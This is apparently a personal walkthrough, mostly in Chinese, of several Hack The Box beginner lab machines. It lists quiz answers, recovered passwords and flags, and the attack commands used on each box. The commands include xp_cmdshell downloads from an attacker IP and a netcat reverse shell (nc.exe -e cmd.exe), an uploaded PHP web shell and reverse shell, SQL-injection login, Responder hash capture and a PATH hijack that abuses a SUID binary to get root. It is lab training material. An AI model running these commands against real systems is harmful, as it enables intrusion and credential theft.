Archetype

Which TCP port is hosting a database server?

1443

What is the name of the non-Administrative share available over SMB?

1
smclient -N -L ip

image-20250322185732370

backups

What is the password identified in the file on the SMB share?

image-20250322185945049

M3g4c0rp123

What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

一眼就看出来

image-20250322190625921

mssqlclient.py

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

xp_cmdshell

What script can be used in order to search possible paths to escalate privileges on Windows hosts?

根据提示搜索peas of windows

image-20250322191305516

What file contains the administrator’s password?

前面利用mssqlclient.py 连上去,借用xp_cmdshell执行WinpEAS

1
2
3
4
5
6
7
8
9
10
11
python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.94.48 -windows-auth    

加载插件
enable_xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;   
xp_cmdshell curl -o \Users\sql_svc\Desktop\winPEASx64.exe -O http://10.10.16.26:8080/winPEASx64.exe

image-20250322193123818

后面发现这里没穿上,路径写错了USRS

下载nc

1
2
3
xp_cmdshell "powershell -c wget http://10.10.16.26:8080/nc.exe -outfile  \Users\sql_svc\Desktop\nc.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Desktop;./nc.exe 10.10.16.26 9999 -e cmd.exe"

image-20250322194743410

前面没下载好,重新下载一遍

1
powershell -c wget http://10.10.16.26:8080/winPEASx64.exe -outfile winPEASx64.exe

image-20250322195447834

1
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

image-20250322195722103

/user:administrator MEGACORP_4dm1n!!

image-20250322200313937

b91ccec3305e98240082d4474b848528

Appointment

What does the acronym SQL stand for?

Structured Query Language

What is one of the most common type of SQL vulnerabilities?

SQL injection

What is the 2021 OWASP Top 10 classification for this vulnerability?

A03:2021-Injection

What does Nmap report as the service and version that are running on port 80 of the target?

nmap -sV 10.129.41.82 -p 80

Apache httpd 2.4.38 ((Debian))

What is the standard port used for the HTTPS protocol?

443

What is a folder called in web-application terminology?

directory

What is the HTTP response code is given for ‘Not Found’ errors?

404

Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?

dir

What single character can be used to comment out the rest of a line in MySQL?

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

这题真是搞笑,登录成功就能看到flag,我还思考了半天,搞了半天交Congratulations

万能密码登录

image-20250323165401219

Sequel

During our scan, which port do we find serving MySQL?

3306

What community-developed MySQL version is the target running?

MariaDB

When using the MySQL command line client, what switch do we need to use in order to specify a login username?

-u

Which username allows us to log into this MariaDB instance without providing a password?

image-20250323170605771

爆到了

root

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

In SQL, what symbol do we need to end each query with?

;

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?

HTB

navicat连上mysql

直接翻翻就找到了

image-20250323170954390

Crocodile

What Nmap scanning switch employs the use of default scripts during a scan?

-sC

What service version is found to be running on port 21?

vsftpd 3.0.3

What FTP code is returned to us for the “Anonymous FTP login allowed” message?

230

After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

get

What is one of the higher-privilege sounding usernames in ‘allowed.userlist’ that we download from the FTP server?

admin

What version of Apache HTTP Server is running on the target host?

Apache httpd 2.4.41

What switch can we use with Gobuster to specify we are looking for specific filetypes?

-x

Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

login.php

ftp连接上之后能看到两个文件,一个是用户名,一个密码,对应一下登录上就OK

image-20250323175324992

image-20250323175454593

直接登录admin得了

admin/rKXM59ESxesUFHAd

Responder

When visiting the web service using the IP address, what is the domain that we are being redirected to?

unika.htb

Which scripting language is being used on the server to generate webpages?

php

What is the name of the URL parameter which is used to load different language versions of the webpage?

pageimage-20250323193559688

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

1
../../../../../../../../windows/system32/drivers/etc/hosts

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

1
//10.10.14.6/somefile

What does NTLM stand for?

New Technology LAN Manager

Which flag do we use in the Responder utility to specify the network interface?

-I

1
sudo responder -I eth0

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

John the Ripper

What is the password for the administrator user?

我很疑惑,就一个目录遍历怎么得到管理员的ntlm的值,后面能加载远程文件,加载个猕猴桃?但也没法执行啊,突然反应过来题目名称叫Responder,把这个工具给忘了

嘶~

image-20250323195659984

试了好多次

badminton

We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

5985

1
ruby evil-winrm.rb -i 10.129.225.33 -u Administrator -p badminton

image-20250323204214719

Three

How many TCP ports are open?

2

What is the domain of the email address provided in the “Contact” section of the website?

mail@thetoppers.htb

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

/etc/hosts

Which sub-domain is discovered during further enumeration?

1
gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb

s3.thetoppers.htb

Which service is running on the discovered sub-domain?

amazon s3

Which command line utility can be used to interact with the service running on the discovered sub-domain?

awscli

Which command is used to set up the AWS CLI installation?

aws configure

What is the command used by the above utility to list all of the S3 buckets?

1
aws s3 ls

This server is configured to run files written in what web scripting language?

php

1
aws --endpoint=http://s3.thetoppers.htb s3 ls

image-20250323212029053

1
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

image-20250323212015809使用cp命令拷贝到s3的桶里

1
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

image-20250323212123276

实际上是(之前post不方便)

1
echo '<?php system($_GET["cmd"]); ?>'  > shell.php

image-20250323212619188

image-20250323213628487

拿到flag

image-20250323214622481

Oopsie

With what kind of tool can intercept web traffic?

proxy

What is the path to the directory on the webserver that returns a login page?

image-20250326191319363

源码可以看到登录路径

/cdn-cgi/login

What can be modified in Firefox to get access to the upload page?

http://10.129.105.45/cdn-cgi/login/admin.php?content=accounts&id=1

image-20250326192836411

获得admin的ID

image-20250326192855893

修改对应值即可

image-20250326192916004

What is the access ID of the admin user?

34322

On uploading a file, what directory does that file appear in on the server?

/uploads

What is the file that contains the password that is shared with the robert user?

db.php

robert共享密碼文件

利用文件上传反弹shell

image-20250326194148814

上传该文件,访问http://10.129.105.45/uploads/php-reverse-shell.php

监听

image-20250326194422861

成功

image-20250326194542170

What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group?

find

搞一个交互式shell

1
SHELL=/bin/bash script -q /dev/null

切换到robert用户 M3g4C0rpUs3r

image-20250326195418443

发现robert在bugtracker组里

查看一下有无特殊权限

1
find / -type f -group bugtracker 2>/dev/null

image-20250326195610086

Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run?

root

What SUID stands for?

Set owner User ID

What is the name of the executable being called in an insecure manner?

cat

这里运行二进制文件发现会调用cat命令

image-20250326195807220

提权,复写cat

1
2
3
4
export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

再次执行bugtracker

成功提权

image-20250326200108178

image-20250326200149090

Vaccine

Besides SSH and HTTP, what other service is hosted on this box?

FTP

This service can be configured to allow login with any password for specific username. What is that username?

What is the name of the file downloaded over this service?

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

What is the password for the admin user on the website?

What option can be passed to sqlmap to try to get command execution via the sql injection?

What program can the postgres user run as root using sudo?